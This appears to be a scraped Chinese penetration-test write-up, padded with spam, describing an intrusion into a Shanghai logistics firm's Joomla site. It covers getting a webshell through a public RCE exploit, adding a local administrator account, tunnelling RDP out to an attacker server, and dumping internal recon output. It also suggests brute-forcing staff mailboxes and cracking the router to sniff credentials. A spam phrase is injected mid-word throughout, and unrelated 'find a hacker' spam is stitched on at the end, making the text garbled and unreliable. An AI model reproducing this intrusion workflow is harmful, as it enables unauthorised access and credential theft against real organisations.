求黑客联系 *** 搜狗问问-浅谈渗透测试实战
0x00 前言
近期,由于工作中缘故一直也没空升级blog。总算忙完后一阵,眼见就需要过年啦,先提早祝大家春节快乐!
许多 情况下,在看白帽们的系统漏洞的情况下总有一种觉得便是把web渗透简易地了解变成发觉web安全漏洞从而获得webshell。实际上,我觉得一个详细的渗入(从黑客的视角去独立思考)应该是以尽一切很有可能获得总体目标的系统软件或是 *** 服务器的更大权限,尽量的发觉充足多的比较敏感信息内容。这一全过程应当包含但不限于下列好多个层面:
信息内容打探: 待渗入总体目标的系统软件,工作人员,机构信息内容等
系统漏洞探测: 全部与待渗入总体目标有关的系统软件的系统漏洞探测
系统软件提权: 运用目前的信息内容对早已获得的系统软件开展提权进而获得更大操纵管理权限
内网渗透: 运用以获得的系统软件做为跳新黑客 *** 破解器板进一步扩张战绩,反复之上三步获得大量的系统软件管理权限和内部网比较敏感信息内容
下边,就是我共享地一个相对性详细的渗入实战,仅作大伙儿沟通交流参照,全部的实际操作在文中公布之前均已修复,请大伙儿切忌用以不法目地。
0x01 信息内容打探
做为渗透测试的之一步,也是最重要地一步就是信息内容打探。孙膑兵法有云:“知彼知己,百战百胜”。
更先是挑选实战的总体目标网站,收集到的信息内容以下:
URL: http://***.**.cn/
外网IP详细地址:58.246.**.**
对外开放的端口号(nmap): 80, 443
基本信息(whois):
Domain Name: 新黑客 *** 破解器 ***.sh.cn
Registrant: 上海市*****货运物流有限责任公司企业
Registrant Contact Email: cs@onlinebusiness.com.cn
Sponsoring Registrar: 北京市中科三方 *** 科技有限责任公司
Name Server: f1g1ns1.dnspod.net
Name Server: f1g1ns2.dnspod.net
Registration Time: 2001-07-26 00:00:00
Expiration Time: 2022-07-26 00:00:00
子网站备案信息:
116.236.199.** mail2.***.sh.cn
180.166.3.** 新黑客 *** 破解器 import.***.sh.cn
58.246.81.** query.***.sh.cn
58.246.81.** mail.***.sh.cn
电子邮箱:
liunian@***.sh.cn
从之上收集到的信息内容,我们可以简易的剖析一下接下去的渗入构思:
搜索域名系统漏洞并运用
运用子站系统漏洞旁注进到系统软件收集大量有效信息内容
0x02 系统漏洞探测
依照上边的构思更先试着找寻域名的系统漏洞,一般可根据AWVS或是别的的漏洞扫描工具做基本的扫描仪,看一下是否会有能够运用的点。可是非常简单立即的方式是开启这一网站,尽量细心的访问 每一很有可能有使用价值的网页页面,以下:
有木有发觉,实际上我们可以观查到一些很有使用价值的信息内容。从上边的信息内容,我们可以发觉这一域名是根据Joomla CMS的,这一实际上对大家接下去的渗入很有协助,大家都了解近期曝出了Joomla的RCE和SQL引入系统漏洞,那麼大家就可以去试着看一下这一站是不是恢复了这种系统漏洞。
因此,我们可以应用早已公布的exp(http://avfisher.win/archives/287)对其开展检测, 以下所显示:
[ ]vuls found! 新黑客 *** 破解器 url: http://×××.sh.cn/, System: Windows NT EESTSWEB01 6.1 build 7601 (Windows Server 2008 R2 Enterprise Edition Service Pack 1) i586 , document_root: C:/xampp/htdocs/××× , script_filename: C:/xampp/htdocs/×××/index.php , shell_file: http://×××.sh.cn/images/1ndex.php
果真系统漏洞的确存有,并且大家也顺利地getshell了,那麼是否代表着大家的渗入早已告一段落呢?新黑客 *** 破解器no,no,no(关键的事儿说3遍),实际上真实的渗入才刚开始。
0x03 系统软件提权
大家发觉这是一个Windows 2008 R2的 *** 服务器,即然大家早已取得了webshell,接下去考虑到的事儿就应该是,我是否可以使得到 访问权限?
更先,在水果刀中运行命令: whoami 看一下如今的shell是在什么管理权限下运作的,以下:
能够看得出大家的shell是在system管理权限下运作的,那麼也就表明我们可以非常容易的加上一个管理人员账号,指令以下:
net user administer
/addnet localgroup administrators administer /add
0x04 内网渗透
接下去,大家就必须经一步查询和搜集系统软件的一些普遍信息内容来协助大家进一步的内网渗透,一般包含下列信息内容:
1. 系统信息 – systeminfo
IP地址: EESTSWEB01
OS 名字: Microsoft Windows Server 2008 R2 Enterprise
OS 版本号: 6新黑客 *** 破解器.1.7601 Service Pack 1 Build 7601
OS 生产商: Microsoft Corporation
OS 配备: 独立主机
OS 预制构件种类: Multiprocessor Free
申请注册的任何人: Windows 客户
申请注册的机构:
商品 ID: 00486-OEM-8400691-20006
原始安裝时间: 2015/5/14, 22:54:49
开机启动時间: 2015/8/3, 16:20:27
系统制造商: Microsoft Corporation
系统软件型号规格: Virtual Machine
系统软件种类: x64-based PC
CPU: 安裝了 2 个CPU。
新黑客 *** 破解器[01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz
[02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~1598 Mhz
BIOS 版本号: American Megatrends Inc. 090006 , 2012/5/23
Windows 文件目录: C:\\Windows
系统目录: C:\\Windows\\system32
起动机器设备: \\Device\\HarddiskVolume1
系统软件地区设定: zh-cn;汉语(我国)
电脑输入法地区设定: zh-cn;汉语(我国)
时区时间: (UTC 08:00)北京市,重庆市,香港特区,乌鲁木齐市新黑客 *** 破解器
物理内存总产量: 2,048 MB
能用的物理内存: 576 MB
虚拟内存设置: 更高值: 4,095 MB
虚拟内存设置: 能用: 2,647 MB
虚拟内存设置: 应用中: 1,448 MB
页面文件部位: C:\\pagefile.sys
域: WORKGROUP
登陆 *** 服务器: 暂缺
修复程序流程: 安裝了 1 个修复程序流程。
[01]: KB976902
网口: 安裝了 1 个 NIC。
[01]: Microsoft vm虚拟机系统总线 *** 适配器
联接名: 本地连接
开启 DHCP: 否
IP 详细地址
[01]: 192.168.0.10
[02]: fe80::9新黑客 *** 破解器8f7:e8a:3eeb:ff6
2. IP信息内容 – ipconfig /all
Windows IP 配备
IP地址 . . . . . . . . . . . . . : EESTSWEB01
主 DNS 后缀名 . . . . . . . . . . . :
连接点种类 . . . . . . . . . . . . : 混和
IP 路由器已开启 . . . . . . . . . . : 否
WINS *** 商已开启 . . . . . . . . . : 否
以太网接口电源适配器 本地连接:
联接特殊的 DNS 后缀名 . . . . . . . :
叙述. .新黑客 *** 破解器 . . . . . . . . . . . . . : Microsoft vm虚拟机系统总线 *** 适配器
物理地址. . . . . . . . . . . . . : 00-15-5D-00-02-01
DHCP 已开启 . . . . . . . . . . . : 否
全自动配备已开启. . . . . . . . . . : 是
当地连接 IPv6 详细地址. . . . . . . . : fe80::98f7:e8a:3eeb:ff6(优选)
IPv4 详细地址 . . . . . . . . . . . . : 192.168.0.10(优选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . 新黑客 *** 破解器 . . . : 192.168.0.230
DHCPv6 IAID . . . . . . . . . . . : 234886493
DHCPv6 手机客户端 DUID . . . . . . . : 00-01-00-01-1C- E6-6D-9C-00-15-5D-00-02-01
DNS 服务器 . . . . . . . . . . . : 192.168.0.1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{ADD2E201-9C5D-480F-8E29-F722627ABA6E}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 新黑客 *** 破解器 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft 新黑客 *** 破解器 Teredo Tunneling Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:7834:496d:18cf:134e:3f57:fff5(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::18cf:134e:3f57:fff5%18(首选)
默认网关. . . . . . . . . . . . . : ::
TCPIP 上的 NetBIOS . . . . . .新黑客 *** 破解器 . : 已禁用
3. 开放的端口信息 – netstat -an
活动连接
协议 本地地址 外部地址 状态
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:10050 0.0.0.0:0 新黑客 *** 破解器 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING
TCP 192.168.0.10:80 125.39.30.131:11235 ESTABLISHED
TCP 192.168新黑客 *** 破解器.0.10:139 0.0.0.0:0 LISTENING
TCP 192.168.0.10:10050 192.168.0.11:40635 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40637 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40645 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40656 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40755 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40786 TIME_WAIT
TCP 1新黑客 *** 破解器92.168.0.10:10050 192.168.0.11:40798 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40811 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40829 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40945 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40980 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40986 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:40991 TIME_新黑客 *** 破解器WAIT
TCP 192.168.0.10:10050 192.168.0.11:41006 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:41115 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:41148 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:41161 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:41171 TIME_WAIT
TCP 192.168.0.10:10050 192.168.0.11:41187 TIME_WAIT
TCP 192.168.0.10:10050 192.168新黑客 *** 破解器.0.11:41306 TIME_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:443 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3389 [::]:0 LISTENING
TCP [::]:10050 [::]:0 LISTENING
TCP [::]:47001 [::]:0 LISTENING
TCP [::]:49152 [::]:0 LISTENING
TCP [::]:49153 [::]:0 新黑客 *** 破解器 LISTENING
TCP [::]:49154 [::]:0 LISTENING
TCP [::]:49155 [::]:0 LISTENING
TCP [::]:49156 [::]:0 LISTENING
TCP [::]:49157 [::]:0 LISTENING
TCP [::1]:3306 [::1]:65055 TIME_WAIT
TCP [::1]:3306 [::1]:65056 TIME_WAIT
TCP [::1]:3306 [::1]:65057 TIME_WAIT
TCP [::1]:65055 [::1]:3306 TIME_WAIT
TCP [::1]:65056 [::1]:3306 TIME_WAIT
TCP [::1新黑客 *** 破解器]:65057 [::1]:3306 TIME_WAIT
TCP [::1]:65058 [::1]:3306 TIME_WAIT
TCP [::1]:65059 [::1]:3306 TIME_WAIT
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:4500 *:*
UDP 0.0.0.0:5355 *:*
UDP 192.168.0.10:137 *:*
UDP 192.168.0.10:138 *:*
UDP [::]:500 *:*
UDP [::]:4500 *:*
UDP [::]:5355 *:*
4. 运行的进程信息 – tasklist
映像名称 PID 会话名 会话#新黑客 *** 破解器 内存使用
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 24 K
System 4 Services 0 364 K
*** ss.exe 492 Services 0 1,612 K
csrss.exe 576 Services 0 8,184 K
wininit.exe 628 Services 0 5,884 K
services.exe 728 Services 0 13,224 K
lsass.exe 736 Services 0 27,344 K
l *** .exe 744 新黑客 *** 破解器 Services 0 7,500 K
svchost.exe 836 Services 0 11,872 K
svchost.exe 916 Services 0 9,888 K
svchost.exe 1000 Services 0 22,876 K
svchost.exe 192 Services 0 46,352 K
svchost.exe 592 Services 0 17,884 K
svchost.exe 520 Services 0 22,124 K
svchost.exe 932 Services 0 21,616 K
svchost.exe 1084 Services 0 14,688 K
spoolsv.exe 1248 Services 0 新黑客 *** 破解器 20,832 K
vmicsvc.exe 1280 Services 0 7,188 K
vmicsvc.exe 1332 Services 0 10,788 K
vmicsvc.exe 1356 Services 0 5,200 K
vmicsvc.exe 1384 Services 0 5,540 K
vmicsvc.exe 1408 Services 0 5,464 K
httpd.exe 1456 Services 0 18,144 K
svchost.exe 1492 Services 0 10,124 K
mysqld.exe 1540 Services 0 474,496 K
svchost.exe 1636 Services 0 3,740 新黑客 *** 破解器 K
zabbix_agentd.exe 1708 Services 0 8,416 K
httpd.exe 2064 Services 0 204,668 K
svchost.exe 2748 Services 0 10,340 K
svchost.exe 2784 Services 0 6,744 K
svchost.exe 2716 Services 0 5,560 K
msdtc.exe 572 Services 0 8,416 K
csrss.exe 3428 Console 2 7,100 K
winlogon.exe 2704 Console 2 5,892 K
LogonUI.exe 3052 Console 2 17,080 新黑客 *** 破解器 K
mmc.exe 1124 Services 0 38,828 K
csrss.exe 1808 RDP-Tcp#0 1 17,060 K
winlogon.exe 812 RDP-Tcp#0 1 7,704 K
taskhost.exe 5040 RDP-Tcp#0 1 8,212 K
rdpclip.exe 3608 RDP-Tcp#0 1 8,072 K
dwm.exe 4772 RDP-Tcp#0 1 7,032 K
explorer.exe 4968 RDP-Tcp#0 1 79,612 K
cmd.exe 4920 RDP-Tcp#0 1 3,820 K
conhost.exe 4624 RDP-Tcp#0 1 6,052 K
xampp-control.exe 新黑客 *** 破解器 4364 RDP-Tcp#0 1 15,992 K
taskmgr.exe 4548 RDP-Tcp#0 1 12,048 K
TrustedInstaller.exe 3188 Services 0 9,748 K
cmd.exe 3920 Services 0 4,016 K
conhost.exe 3944 Services 0 3,668 K
cmd.exe 2988 Services 0 4,028 K
tasklist.exe 5036 Services 0 6,148 K
WmiPrvSE.exe 3620 Services 0 7,556 K
5. 局域网中公开的文件共享 – net view
服务器名称 注解
-------------------------------------------------------------------------------
\\EESHQAP02
\\EESHR eeshr
\\EESTS006
\\EESTSWEB01 Web Server
\\EESTSWEB02
\\EESWEBSQL02
\\FORLOG forlog share
\\FORLOG-IIS
\\JERRY JERRY
\\ *** ILINGM-2511FC
命令成功完成。
6. 局域网中的域的信息 – net view 新黑客 *** 破解器 /domain
Domain
-------------------------------------------------------------------------------
EES
WORKGROUP
命令成功完成。
分析并提取有用信息:
主机名: EESTSWEB01
内网IP: 192.168.0.10
内网网关: 192.168.0.230
操作系统: Windows 2008 R2
所在域: WORKGROUP
杀毒软件:未发现
WEB服务器组件: XAMPP
端口: 80(HTTP), 3306(MySQL), 3389(RDP)
局域网所有的域: EES,新黑客 *** 破解器 WORKGROUP
根据上面的分析,我们发现目标服务器已经开放了RDP(3389)但是服务器是在内网我们无法直接外连。既然如此,我们可以考虑端口转发到我们自己的外网服务器然后在连接。
之一步, 上传端口转发工具(可以参考http://avfisher.win/archives/318)
第二步,外网服务器开启端口监听端口5001和5002
第三步,内网服务器开启端口转发,将本地端口3389转发到外网服务器监听的端口5002上
第四步,发起RDP外连外网服务器的端口5001
现在,我们已经成功地利用端口转发并RDP连接到了内网这台服务器上了。
打开XAMPP,我们可以很容易的查看网站的数据库数据:
为了进一步渗透内网,我们需要对内网进行扫描,看看内网开启了哪些服务,这里我推荐一款快速扫描内网的工具(MyLanViewer),结果如下:
内网的一些共享目录:(各种内部资料和信息)
一些内网的系统:
私有云云存储管理系统:(可以为共享目录设置权限)
无线路由器:(内网流量嗅探和截取)
打印机:(获取到了部分企业联系人的通讯录)
事实上,至此整个渗透仍旧没有结束,我们目前只是获得了一台WORKGROUP的服务器,而实际上仍旧有10几台服务器在EES域里,那么我们接下来该怎么突破呢?
其实可利用的思路还有很多,比如:
1. 结合上面我们在内网扫到的通讯录以及我们之前搜集到的子域名邮箱 mail.***.sh.cn(见0x01),我们可以先根据邮箱地址生成一个密码字典进行暴力破解,看看能不能在用户的邮箱中获取其他有用的信息
2. 继续挖掘和分析其他的子站可能存在的漏洞继而逐步突破
3. 尝试破解上面获得的无线路由器密码嗅探 *** 流量获取企业员工的用户名和密码
在此就不再深入下去了!总之,渗透是一门特别的艺术,必须善于运用一切已获取的信息不断变换思路最终达成目的。
0x05 新黑客 *** 破解器 总结
渗透是一个特别需要经验,细心和耐心的工作,你必须从黑客的角度去考虑每一个可能存在的漏洞进而利用并扩大战果。
总结上面的这次实战的结果,可以简单概括成以下几点:
耐心: 必须有足够的耐心去搜集目标的一切可能相关的信息
细心: 仔细地观察和了解你的目标,不放过每一个细节,从细节中获得突破口
思路: 善于总结和归纳所有的已知信息,并结合在平时积累的各种渗透思路进一步扩大战果
总结: 把每次实战中接触和学习到的东西总结起来并从中提取出实用的思路以便下次实战中的再次利用
。 *** 警察所在的部门一般叫做“ *** 监察支队或大队”,他们一般受理以下报案及负责侦查以下违法犯罪案件:1、利用计算机 *** 实施诈骗、盗窃等违法。求黑客联系方式搜狗问问
黑客怎么在qq找到别人位置。1.学习如何新黑客 *** 破解器编程这当然是最基本的黑客技能。如果你还不会任何编程语言,我建议你从Python开始。它设计清晰,文档齐全,合适初学者入门。它是一门。
求黑客联系方式搜狗问问俗话说,入乡随俗,既然入了黑客的门,就必须懂得黑客的行话,下面编者将介绍黑客专用术语。 1.肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被。
我会入侵电脑但不会入侵手机各种科幻影片当中,我们都能够非常广泛的看见黑客的身影,他们只需要随身携带一台电脑,然后在键盘上噼里啪啦一顿操作,
[专业]如果是进操作系统在登陆窗口不小心忘记了开机密码,或者被别人锁了密码,又不想重装系统:这种情况没有开机密码,可。求黑客联系方式搜狗问问
这个是不可以盗取别人 *** 的。现在的 *** 防污措施很高,其实你盗取了也会被找回所以说不要想这种违法的事情,既然你多想一些正能量的事情。
求黑客联系新黑客 *** 破解器方式搜狗问问。2001中美黑客大战这有这件是最著名的了。内容很长,你上去看看吧北京讯)中国红客联盟宣称网上卫国战在8日已攻陷美国3个海军网站,纪念美国误炸中国驻南斯拉夫大使馆罹难的3名中国人,并且以此役为终结战代表作。新浪网收。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。